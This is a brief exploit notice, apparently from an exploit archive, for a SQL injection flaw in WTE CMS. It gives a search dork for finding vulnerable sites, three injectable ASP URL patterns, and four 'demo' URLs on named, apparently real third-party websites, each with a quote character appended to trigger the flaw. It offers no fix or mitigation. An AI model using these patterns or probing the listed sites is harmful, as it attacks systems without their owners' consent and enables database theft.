WTE CMS suffers from a remote SQL injection vulnerability.
3556e960654d7215572a57baccb5310d001a923e6fc6f58654628d9dba33f3e6
########################################################################################
# #
# Exploit Title : WTE CMS SQL Injection Vulnerability #
# #
# Author : Secure-Land Security Team #
# #
# Discovered By : farbodmahini #
# #
# Home : Secure-Land.net #
# #
# Version : All Version #
# #
# Vendor : www.wte.cn #
# #
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #
# #
# Security Risk : High #
# #
# DorK : "Powered by WTE" #
# #
# #
########################################################################################
# #
# Expl0iT: #
# #
# http://[TarGeT]/project.asp?id=[SQL] #
# http://[TarGeT]/showpro.asp?id=[SQL] #
# http://[TarGeT]/products.asp?id=[SQL] #
# #
# #
# Demo : #
# #
# http://www.ruiyico.com/showpro.asp?id=2' #
# http://www.jtylss.com/products.asp?id=1' #
# http://www.jtylss.com/project.asp?id=5' #
# http://www.ruiyico.com/products.asp?id=1' #
# #
########################################################################################
# #
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #
# #
########################################################################################
# #
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #
# #
########################################################################################